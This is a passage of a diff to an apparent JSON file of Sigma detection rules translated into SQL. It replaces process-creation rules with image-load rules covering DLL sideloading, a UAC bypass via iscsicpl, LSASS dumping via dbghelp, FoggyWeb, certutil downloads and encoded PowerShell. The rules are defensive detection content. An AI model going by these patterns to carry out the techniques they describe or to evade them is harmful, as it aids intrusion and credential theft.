"falsepositives": [ "Unknown" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((ParentProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\powershell\\_ise.exe' ESCAPE '\\') AND (NewProcessName LIKE '%\\\\sh.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\bash.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\schtasks.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\certutil.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\bitsadmin.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\wscript.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\cscript.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\scrcons.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\regsvr32.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\hh.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\wmic.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\mshta.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\forfiles.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\scriptrunner.exe' ESCAPE '\\')) AND NOT ((ParentCommandLine LIKE '%\\\\Program Files\\\\Amazon\\\\WorkspacesConfig\\\\Scripts\\\\%' ESCAPE '\\' AND CommandLine LIKE '%\\\\Program Files\\\\Amazon\\\\WorkspacesConfig\\\\Scripts\\\\%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((NewProcessName LIKE '%\\\\excel.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\mspub.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\onenote.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\onenoteim.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\outlook.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\powerpnt.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\winword.exe' ESCAPE '\\') AND ImageLoaded LIKE 'C:\\\\Windows\\\\assembly\\\\%' ESCAPE '\\')" ], - "filename": "proc_creation_win_powershell_susp_child_processes.yml" + "filename": "image_load_office_dotnet_assembly_dll_load.yml" }, { - "title": "Indirect Command Execution By Program Compatibility Wizard", - "id": "b97cd4b1-30b8-4a9d-bd72-6293928d52bc", + "title": "Wmiprvse Wbemcomn DLL Hijack", + "id": "7707a579-e0d8-4886-a853-ce47e4575aaa", "status": "test", - "description": "Detect indirect command execution via Program Compatibility Assistant pcwrun.exe", - "author": "A. Sungurov , oscd.community", + "description": "Detects a threat actor creating a file named `wbemcomn.dll` in the `C:\\Windows\\System32\\wbem\\` directory over the network and loading it for a WMI DLL Hijack scenario.", + "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)", "tags": [ - "attack.defense_evasion", - "attack.t1218", - "attack.execution" + "attack.execution", + "attack.t1047", + "attack.lateral_movement", + "attack.t1021.002" ], "falsepositives": [ - "Need to use extra processing with 'unique_count' / 'filter' to focus on outliers as opposed to commonly seen artifacts", - "Legit usage of scripts" + "Unknown" ], - "level": "low", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND ParentProcessName LIKE '%\\\\pcwrun.exe' ESCAPE '\\')" + "SELECT * FROM logs WHERE (NewProcessName LIKE '%\\\\wmiprvse.exe' ESCAPE '\\' AND ImageLoaded LIKE '%\\\\wbem\\\\wbemcomn.dll' ESCAPE '\\')" ], - "filename": "proc_creation_win_lolbin_pcwrun.yml" + "filename": "image_load_wmiprvse_wbemcomn_dll_hijack.yml" }, { - "title": "Suspicious Obfuscated PowerShell Code", - "id": "8d01b53f-456f-48ee-90f6-bc28e67d4e35", - "status": "experimental", - "description": "Detects suspicious UTF16 and base64 encoded and often obfuscated PowerShell code often used in command lines", - "author": "Florian Roth (Nextron Systems)", + "title": "Active Directory Parsing DLL Loaded Via Office Application", + "id": "a2a3b925-7bb0-433b-b508-db9003263cc4", + "status": "test", + "description": "Detects DSParse DLL being loaded by an Office Product", + "author": "Antonlovesdnb", "tags": [ - "attack.defense_evasion" + "attack.execution", + "attack.t1204.002" ], "falsepositives": [ "Unknown" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND (CommandLine LIKE '%IAAtAGIAeABvAHIAIAAwAHgA%' ESCAPE '\\' OR CommandLine LIKE '%AALQBiAHgAbwByACAAMAB4A%' ESCAPE '\\' OR CommandLine LIKE '%gAC0AYgB4AG8AcgAgADAAeA%' ESCAPE '\\' OR CommandLine LIKE '%AC4ASQBuAHYAbwBrAGUAKAApACAAfAAg%' ESCAPE '\\' OR CommandLine LIKE '%AuAEkAbgB2AG8AawBlACgAKQAgAHwAI%' ESCAPE '\\' OR CommandLine LIKE '%ALgBJAG4AdgBvAGsAZQAoACkAIAB8AC%' ESCAPE '\\' OR CommandLine LIKE '%AHsAMQB9AHsAMAB9ACIAIAAtAGYAI%' ESCAPE '\\' OR CommandLine LIKE '%B7ADEAfQB7ADAAfQAiACAALQBmAC%' ESCAPE '\\' OR CommandLine LIKE '%AewAxAH0AewAwAH0AIgAgAC0AZgAg%' ESCAPE '\\' OR CommandLine LIKE '%AHsAMAB9AHsAMwB9ACIAIAAtAGYAI%' ESCAPE '\\' OR CommandLine LIKE '%B7ADAAfQB7ADMAfQAiACAALQBmAC%' ESCAPE '\\' OR CommandLine LIKE '%AewAwAH0AewAzAH0AIgAgAC0AZgAg%' ESCAPE '\\' OR CommandLine LIKE '%AHsAMgB9AHsAMAB9ACIAIAAtAGYAI%' ESCAPE '\\' OR CommandLine LIKE '%B7ADIAfQB7ADAAfQAiACAALQBmAC%' ESCAPE '\\' OR CommandLine LIKE '%AewAyAH0AewAwAH0AIgAgAC0AZgAg%' ESCAPE '\\' OR CommandLine LIKE '%AHsAMQB9AHsAMAB9ACcAIAAtAGYAI%' ESCAPE '\\' OR CommandLine LIKE '%B7ADEAfQB7ADAAfQAnACAALQBmAC%' ESCAPE '\\' OR CommandLine LIKE '%AewAxAH0AewAwAH0AJwAgAC0AZgAg%' ESCAPE '\\' OR CommandLine LIKE '%AHsAMAB9AHsAMwB9ACcAIAAtAGYAI%' ESCAPE '\\' OR CommandLine LIKE '%B7ADAAfQB7ADMAfQAnACAALQBmAC%' ESCAPE '\\' OR CommandLine LIKE '%AewAwAH0AewAzAH0AJwAgAC0AZgAg%' ESCAPE '\\' OR CommandLine LIKE '%AHsAMgB9AHsAMAB9ACcAIAAtAGYAI%' ESCAPE '\\' OR CommandLine LIKE '%B7ADIAfQB7ADAAfQAnACAALQBmAC%' ESCAPE '\\' OR CommandLine LIKE '%AewAyAH0AewAwAH0AJwAgAC0AZgAg%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((NewProcessName LIKE '%\\\\excel.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\mspub.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\onenote.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\onenoteim.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\outlook.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\powerpnt.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\winword.exe' ESCAPE '\\') AND ImageLoaded LIKE '%\\\\dsparse.dll%' ESCAPE '\\')" ], - "filename": "proc_creation_win_powershell_encoded_obfusc.yml" + "filename": "image_load_office_dsparse_dll_load.yml" }, { - "title": "Suspicious Download Via Certutil.EXE", - "id": "19b08b1c-861d-4e75-a1ef-ea0c1baf202b", - "status": "test", - "description": "Detects the execution of certutil with certain flags that allow the utility to download files.", - "author": "Florian Roth (Nextron Systems), Jonhnathan Ribeiro, oscd.community, Nasreddine Bencherchali (Nextron Systems)", + "title": "Potential DLL Sideloading Via ClassicExplorer32.dll", + "id": "caa02837-f659-466f-bca6-48bde2826ab4", + "status": "experimental", + "description": "Detects potential DLL sideloading using ClassicExplorer32.dll from the Classic Shell software", + "author": "frack113", "tags": [ "attack.defense_evasion", - "attack.t1027" + "attack.persistence", + "attack.privilege_escalation", + "attack.t1574.001", + "attack.t1574.002" ], "falsepositives": [ "Unknown" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\certutil.exe' ESCAPE '\\' OR OriginalFileName = 'CertUtil.exe') AND (CommandLine LIKE '%urlcache %' ESCAPE '\\' OR CommandLine LIKE '%verifyctl %' ESCAPE '\\') AND CommandLine LIKE '%http%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (ImageLoaded LIKE '%\\\\ClassicExplorer32.dll' ESCAPE '\\' AND NOT (ImageLoaded LIKE 'C:\\\\Program Files\\\\Classic Shell\\\\%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_certutil_download.yml" + "filename": "image_load_side_load_classicexplorer32.yml" }, { - "title": "Control Panel Items", - "id": "0ba863e6-def5-4e50-9cea-4dd8c7dc46a4", + "title": "FoggyWeb Backdoor DLL Loading", + "id": "640dc51c-7713-4faa-8a0e-e7c0d9d4654c", "status": "test", - "description": "Detects the malicious use of a control panel item", - "author": "Kyaw Min Thein, Furkan Caliskan (@caliskanfurkan_)", + "description": "Detects DLL hijacking technique used by NOBELIUM in their FoggyWeb backdoor. Which loads a malicious version of the expected \"version.dll\" dll", + "author": "Florian Roth (Nextron Systems)", + "tags": [ + "attack.resource_development", + "attack.t1587" + ], + "falsepositives": [ + "Unlikely" + ], + "level": "critical", + "rule": [ + "SELECT * FROM logs WHERE ImageLoaded LIKE 'C:\\\\Windows\\\\ADFS\\\\version.dll' ESCAPE '\\'" + ], + "filename": "image_load_malware_foggyweb_nobelium.yml" + }, + { + "title": "Suspicious Volume Shadow Copy Vssapi.dll Load", + "id": "37774c23-25a1-4adb-bb6d-8bb9fd59c0f8", + "status": "experimental", + "description": "Detects the image load of VSS DLL by uncommon executables", + "author": "frack113", "tags": [ - "attack.execution", "attack.defense_evasion", - "attack.t1218.002", - "attack.persistence", - "attack.t1546" + "attack.impact", + "attack.t1490" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (((NewProcessName LIKE '%\\\\reg.exe' ESCAPE '\\' OR OriginalFileName = 'reg.exe') AND (CommandLine LIKE '%add%' ESCAPE '\\' AND CommandLine LIKE '%CurrentVersion\\\\Control Panel\\\\CPLs%' ESCAPE '\\')) OR (CommandLine LIKE '%.cpl' ESCAPE '\\' AND NOT (((CommandLine LIKE '%\\\\System32\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\%System\\%%' ESCAPE '\\')) OR (CommandLine LIKE '%regsvr32 %' ESCAPE '\\' AND CommandLine LIKE '% /s %' ESCAPE '\\' AND CommandLine LIKE '%igfxCPL.cpl%' ESCAPE '\\')))))" + "SELECT * FROM logs WHERE (ImageLoaded LIKE '%\\\\vssapi.dll' ESCAPE '\\' AND NOT (((NewProcessName LIKE 'C:\\\\Windows\\\\explorer.exe' ESCAPE '\\' OR NewProcessName LIKE '\tC:\\\\Windows\\\\ImmersiveControlPanel\\\\SystemSettings.exe' ESCAPE '\\') OR (NewProcessName LIKE 'C:\\\\Windows\\\\System32\\\\%' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Windows\\\\SysWOW64\\\\%' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Windows\\\\Temp\\\\{%' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Windows\\\\WinSxS\\\\%' ESCAPE '\\')) OR ((NewProcessName LIKE 'C:\\\\Program Files\\\\%' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Program Files (x86)\\\\%' ESCAPE '\\')) OR (NewProcessName LIKE 'C:\\\\ProgramData\\\\Package Cache\\\\%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_control_panel_item.yml" + "filename": "image_load_dll_vssapi_susp_load.yml" }, { - "title": "Potential Download/Upload Activity Using Type Command", - "id": "aa0b3a82-eacc-4ec3-9150-b5a9a3e3f82f", + "title": "Potential Antivirus Software DLL Sideloading", + "id": "552b6b65-df37-4d3e-a258-f2fc4771ae54", "status": "experimental", - "description": "Detects usage of the \"type\" command to download/upload data from WebDAV server", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects potential DLL sideloading of DLLs that are part of antivirus software suchas McAfee, Symantec...etc", + "author": "Nasreddine Bencherchali (Nextron Systems), Wietze Beukema (project and research)", "tags": [ - "attack.command_and_control", - "attack.t1105" + "attack.defense_evasion", + "attack.persistence", + "attack.privilege_escalation", + "attack.t1574.001", + "attack.t1574.002" ], "falsepositives": [ - "Unknown" + "Applications that load the same dlls mentioned in the detection section. Investigate them and filter them out if a lot FPs are caused.", + "Dell SARemediation plugin folder (C:\\Program Files\\Dell\\SARemediation\\plugin\\log.dll) is known to contain the 'log.dll' file.", + "The Canon MyPrinter folder 'C:\\Program Files\\Canon\\MyPrinter\\' is known to contain the 'log.dll' file" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((CommandLine LIKE '%type %' ESCAPE '\\' AND CommandLine LIKE '% > \\\\\\\\\\*' ESCAPE '\\') OR (CommandLine LIKE '%type \\\\\\\\\\*' ESCAPE '\\' AND CommandLine LIKE '% > %' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (((((((ImageLoaded LIKE '%\\\\log.dll' ESCAPE '\\' AND NOT (((ImageLoaded LIKE 'C:\\\\Program Files\\\\Bitdefender Antivirus Free\\\\%' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\Program Files (x86)\\\\Bitdefender Antivirus Free\\\\%' ESCAPE '\\')) OR (NewProcessName LIKE 'C:\\\\Program Files\\\\Dell\\\\SARemediation\\\\audit\\\\TelemetryUtility.exe' ESCAPE '\\' AND (ImageLoaded LIKE 'C:\\\\Program Files\\\\Dell\\\\SARemediation\\\\plugin\\\\log.dll' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\Program Files\\\\Dell\\\\SARemediation\\\\audit\\\\log.dll' ESCAPE '\\')) OR (ImageLoaded LIKE 'C:\\\\Program Files\\\\Canon\\\\MyPrinter\\\\%' ESCAPE '\\'))) OR (ImageLoaded LIKE '%\\\\qrt.dll' ESCAPE '\\' AND NOT ((ImageLoaded LIKE 'C:\\\\Program Files\\\\F-Secure\\\\Anti-Virus\\\\%' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\Program Files (x86)\\\\F-Secure\\\\Anti-Virus\\\\%' ESCAPE '\\')))) OR ((ImageLoaded LIKE '%\\\\ashldres.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\lockdown.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\vsodscpl.dll' ESCAPE '\\') AND NOT ((ImageLoaded LIKE 'C:\\\\Program Files\\\\McAfee\\\\%' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\Program Files (x86)\\\\McAfee\\\\%' ESCAPE '\\')))) OR (ImageLoaded LIKE '%\\\\vftrace.dll' ESCAPE '\\' AND NOT ((ImageLoaded LIKE 'C:\\\\Program Files\\\\CyberArk\\\\Endpoint Privilege Manager\\\\Agent\\\\x32\\\\%' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\Program Files (x86)\\\\CyberArk\\\\Endpoint Privilege Manager\\\\Agent\\\\x32\\\\%' ESCAPE '\\')))) OR (ImageLoaded LIKE '%\\\\wsc.dll' ESCAPE '\\' AND NOT ((ImageLoaded LIKE 'C:\\\\program Files\\\\AVAST Software\\\\Avast\\\\%' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\program Files (x86)\\\\AVAST Software\\\\Avast\\\\%' ESCAPE '\\')))) OR (ImageLoaded LIKE '%\\\\tmdbglog.dll' ESCAPE '\\' AND NOT ((ImageLoaded LIKE 'C:\\\\program Files\\\\Trend Micro\\\\Titanium\\\\%' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\program Files (x86)\\\\Trend Micro\\\\Titanium\\\\%' ESCAPE '\\')))) OR (ImageLoaded LIKE '%\\\\DLPPREM32.dll' ESCAPE '\\' AND NOT ((ImageLoaded LIKE 'C:\\\\program Files\\\\ESET%' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\program Files (x86)\\\\ESET%' ESCAPE '\\'))))" ], - "filename": "proc_creation_win_lolbin_type.yml" + "filename": "image_load_side_load_antivirus.yml" }, { - "title": "Invoke-Obfuscation CLIP+ Launcher", - "id": "b222df08-0e07-11eb-adc1-0242ac120002", + "title": "Suspicious Unsigned Dbghelp/Dbgcore DLL Loaded", + "id": "bdc64095-d59a-42a2-8588-71fd9c9d9abc", "status": "test", - "description": "Detects Obfuscated use of Clip.exe to execute PowerShell", - "author": "Jonathan Cheong, oscd.community", + "description": "Detects the load of dbghelp/dbgcore DLL (used to make memory dumps) by suspicious processes.\nTools like ProcessHacker and some attacker tradecract use MiniDumpWriteDump API found in dbghelp.dll or dbgcore.dll.\nAs an example, SilentTrynity C2 Framework has a module that leverages this API to dump the contents of Lsass.exe and transfer it over the network back to the attacker's machine.\n", + "author": "Perez Diego (@darkquassar), oscd.community, Ecco", "tags": [ - "attack.defense_evasion", - "attack.t1027", - "attack.execution", - "attack.t1059.001" + "attack.credential_access", + "attack.t1003.001" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine LIKE '%cmd%' ESCAPE '\\' AND CommandLine LIKE '%&&%' ESCAPE '\\' AND CommandLine LIKE '%clipboard]::%' ESCAPE '\\' AND CommandLine LIKE '%-f%' ESCAPE '\\' AND (CommandLine LIKE '%/c%' ESCAPE '\\' OR CommandLine LIKE '%/r%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((ImageLoaded LIKE '%\\\\dbghelp.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dbgcore.dll' ESCAPE '\\') AND Signed = 'false')" ], - "filename": "proc_creation_win_hktl_invoke_obfuscation_clip.yml" + "filename": "image_load_dll_dbghelp_dbgcore_unsigned_load.yml" }, { - "title": "New Service Creation Using Sc.EXE", - "id": "85ff530b-261d-48c6-a441-facaa2e81e48", - "status": "test", - "description": "Detects the creation of a new service using the \"sc.exe\" utility.", - "author": "Timur Zinniatullin, Daniil Yugoslavskiy, oscd.community", + "title": "DLL Sideloading Of DBGCORE.DLL", + "id": "9ca2bf31-0570-44d8-a543-534c47c33ed7", + "status": "experimental", + "description": "Detects DLL sideloading of \"dbgcore.dll\"", + "author": "Nasreddine Bencherchali (Nextron Systems), Wietze Beukema (project and research)", "tags": [ + "attack.defense_evasion", "attack.persistence", "attack.privilege_escalation", - "attack.t1543.003" + "attack.t1574.001", + "attack.t1574.002" ], "falsepositives": [ - "Legitimate administrator or user creates a service for legitimate reasons.", - "Software installation" + "Legitimate applications loading their own versions of the DLL mentioned in this rule" ], - "level": "low", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND NewProcessName LIKE '%\\\\sc.exe' ESCAPE '\\' AND CommandLine LIKE '%create%' ESCAPE '\\' AND CommandLine LIKE '%binPath%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (ImageLoaded LIKE '%\\\\dbgcore.dll' ESCAPE '\\' AND NOT (((ImageLoaded LIKE 'C:\\\\Windows\\\\System32\\\\%' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\Windows\\\\SysWOW64\\\\%' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\Windows\\\\WinSxS\\\\%' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\Windows\\\\SoftwareDistribution\\\\%' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\Windows\\\\SystemTemp\\\\%' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\Program Files (x86)\\\\%' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\Program Files\\\\%' ESCAPE '\\'))))" ], - "filename": "proc_creation_win_sc_create_service.yml" + "filename": "image_load_side_load_dbgcore_dll.yml" }, { - "title": "Windows Update Client LOLBIN", - "id": "d7825193-b70a-48a4-b992-8b5b3015cc11", + "title": "Potential DLL Sideloading Via comctl32.dll", + "id": "6360757a-d460-456c-8b13-74cf0e60cceb", "status": "experimental", - "description": "Detects code execution via the Windows Update client (wuauclt)", - "author": "FPT.EagleEye Team", + "description": "Detects potential DLL sideloading using comctl32.dll to obtain system privileges", + "author": "Nasreddine Bencherchali (Nextron Systems), Subhash Popuri (@pbssubhash)", "tags": [ - "attack.command_and_control", - "attack.execution", - "attack.t1105", - "attack.t1218" + "attack.defense_evasion", + "attack.persistence", + "attack.privilege_escalation", + "attack.t1574.001", + "attack.t1574.002" ], "falsepositives": [ - "Unknown" + "Unlikely" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\wuauclt.exe' ESCAPE '\\' OR OriginalFileName = 'wuauclt.exe') AND (CommandLine LIKE '%/UpdateDeploymentProvider%' ESCAPE '\\' AND CommandLine LIKE '%/RunHandlerComServer%' ESCAPE '\\' AND CommandLine LIKE '%.dll%' ESCAPE '\\')) AND NOT ((CommandLine LIKE '% /ClassId %' ESCAPE '\\' OR CommandLine LIKE '% wuaueng.dll %' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((ImageLoaded LIKE 'C:\\\\Windows\\\\System32\\\\logonUI.exe.local\\\\%' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\Windows\\\\System32\\\\werFault.exe.local\\\\%' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\Windows\\\\System32\\\\consent.exe.local\\\\%' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\Windows\\\\System32\\\\narrator.exe.local\\\\%' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\windows\\\\system32\\\\wermgr.exe.local\\\\%' ESCAPE '\\') AND ImageLoaded LIKE '%\\\\comctl32.dll' ESCAPE '\\')" ], - "filename": "proc_creation_win_wuauclt_execution.yml" + "filename": "image_load_side_load_comctl32.yml" }, { - "title": "Invoke-Obfuscation VAR++ LAUNCHER OBFUSCATION", - "id": "e9f55347-2928-4c06-88e5-1a7f8169942e", - "status": "test", - "description": "Detects Obfuscated Powershell via VAR++ LAUNCHER", - "author": "Timur Zinniatullin, oscd.community", + "title": "UAC Bypass Using Iscsicpl - ImageLoad", + "id": "9ed5959a-c43c-4c59-84e3-d28628429456", + "status": "experimental", + "description": "Detects the \"iscsicpl.exe\" UAC bypass technique that leverages a DLL Search Order hijacking technique to load a custom DLL's from temp or a any user controlled location in the users %PATH%", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ "attack.defense_evasion", - "attack.t1027", - "attack.execution", - "attack.t1059.001" + "attack.privilege_escalation", + "attack.t1548.002" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine LIKE '%&&set%' ESCAPE '\\' AND CommandLine LIKE '%cmd%' ESCAPE '\\' AND CommandLine LIKE '%/c%' ESCAPE '\\' AND CommandLine LIKE '%-f%' ESCAPE '\\' AND (CommandLine LIKE '%{0}%' ESCAPE '\\' OR CommandLine LIKE '%{1}%' ESCAPE '\\' OR CommandLine LIKE '%{2}%' ESCAPE '\\' OR CommandLine LIKE '%{3}%' ESCAPE '\\' OR CommandLine LIKE '%{4}%' ESCAPE '\\' OR CommandLine LIKE '%{5}%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((NewProcessName LIKE 'C:\\\\Windows\\\\SysWOW64\\\\iscsicpl.exe' ESCAPE '\\' AND ImageLoaded LIKE '%\\\\iscsiexe.dll' ESCAPE '\\') AND NOT (ImageLoaded LIKE '%C:\\\\Windows\\\\%' ESCAPE '\\' AND ImageLoaded LIKE '%iscsiexe.dll%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_hktl_invoke_obfuscation_via_var.yml" + "filename": "image_load_uac_bypass_iscsicpl.yml" }, { - "title": "PUA - Nmap/Zenmap Execution", - "id": "f6ecd1cf-19b8-4488-97f6-00f0924991a3", + "title": "Time Travel Debugging Utility Usage - Image", + "id": "e76c8240-d68f-4773-8880-5c6f63595aaf", "status": "test", - "description": "Detects usage of namp/zenmap. Adversaries may attempt to get a listing of services running on remote hosts, including those that may be vulnerable to remote software exploitation", - "author": "frack113", + "description": "Detects usage of Time Travel Debugging Utility. Adversaries can execute malicious processes and dump processes, such as lsass.exe, via tttracer.exe.", + "author": "Ensar Şamil, @sblmsrsn, @oscd_initiative", "tags": [ - "attack.discovery", - "attack.t1046" + "attack.defense_evasion", + "attack.credential_access", + "attack.t1218", + "attack.t1003.001" ], "falsepositives": [ - "Network administrator computer" + "Legitimate usage by software developers/testers" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\nmap.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\zennmap.exe' ESCAPE '\\') OR OriginalFileName IN ('nmap.exe', 'zennmap.exe')))" + "SELECT * FROM logs WHERE (ImageLoaded LIKE '%\\\\ttdrecord.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\ttdwriter.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\ttdloader.dll' ESCAPE '\\')" ], - "filename": "proc_creation_win_pua_nmap_zenmap.yml" + "filename": "image_load_tttracer_mod_load.yml" }, { - "title": "Suspicious RASdial Activity", - "id": "6bba49bf-7f8c-47d6-a1bb-6b4dece4640e", - "status": "test", - "description": "Detects suspicious process related to rasdial.exe", - "author": "juju4", + "title": "DLL Loaded From Suspicious Location Via Cmspt.EXE", + "id": "75e508f7-932d-4ebc-af77-269237a84ce1", + "status": "experimental", + "description": "Detects cmstp loading \"dll\" or \"ocx\" files from suspicious locations", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ "attack.defense_evasion", - "attack.execution", - "attack.t1059" + "attack.t1218.003" ], "falsepositives": [ - "False positives depend on scripts and administrative tools used in the monitored environment" + "Unikely" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND NewProcessName LIKE '%rasdial.exe' ESCAPE '\\')" + "SELECT * FROM logs WHERE (NewProcessName LIKE '%\\\\cmstp.exe' ESCAPE '\\' AND (ImageLoaded LIKE '%\\\\PerfLogs\\\\%' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\ProgramData\\\\%' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\Users\\\\%' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\Windows\\\\Temp\\\\%' ESCAPE '\\' OR ImageLoaded LIKE '%C:\\\\Temp\\\\%' ESCAPE '\\') AND (ImageLoaded LIKE '%.dll' ESCAPE '\\' OR ImageLoaded LIKE '%.ocx' ESCAPE '\\'))" ], - "filename": "proc_creation_win_rasdial_execution.yml" + "filename": "image_load_cmstp_load_dll_from_susp_location.yml" }, { - "title": "Add User to Local Administrators Group", - "id": "ad720b90-25ad-43ff-9b5e-5c841facc8e5", - "status": "experimental", - "description": "Detects suspicious command line that adds an account to the local administrators/administrateurs group", - "author": "Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)", + "title": "GAC DLL Loaded Via Office Applications", + "id": "90217a70-13fc-48e4-b3db-0d836c5824ac", + "status": "test", + "description": "Detects any GAC DLL being loaded by an Office Product", + "author": "Antonlovesdnb", "tags": [ - "attack.persistence", - "attack.t1098" + "attack.execution", + "attack.t1204.002" ], "falsepositives": [ - "Administrative activity" + "Legitimate macro usage. Add the appropriate filter according to your environment" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((CommandLine LIKE '%localgroup %' ESCAPE '\\' AND CommandLine LIKE '% /add%' ESCAPE '\\') OR (CommandLine LIKE '%Add-LocalGroupMember %' ESCAPE '\\' AND CommandLine LIKE '% -Group %' ESCAPE '\\')) AND (CommandLine LIKE '% administrators %' ESCAPE '\\' OR CommandLine LIKE '% administrateur%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((NewProcessName LIKE '%\\\\excel.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\mspub.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\onenote.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\onenoteim.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\outlook.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\powerpnt.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\winword.exe' ESCAPE '\\') AND ImageLoaded LIKE 'C:\\\\Windows\\\\Microsoft.NET\\\\assembly\\\\GAC\\_MSIL%' ESCAPE '\\')" ], - "filename": "proc_creation_win_susp_add_user_local_admin_group.yml" + "filename": "image_load_office_dotnet_gac_dll_load.yml" }, { - "title": "Suspicious Msiexec Quiet Install", - "id": "79a87aa6-e4bd-42fc-a5bb-5e6fbdcd62f5", - "status": "experimental", - "description": "Adversaries may abuse msiexec.exe to proxy execution of malicious payloads.\nMsiexec.exe is the command-line utility for the Windows Installer and is thus commonly associated with executing installation packages (.msi)\n", - "author": "frack113", + 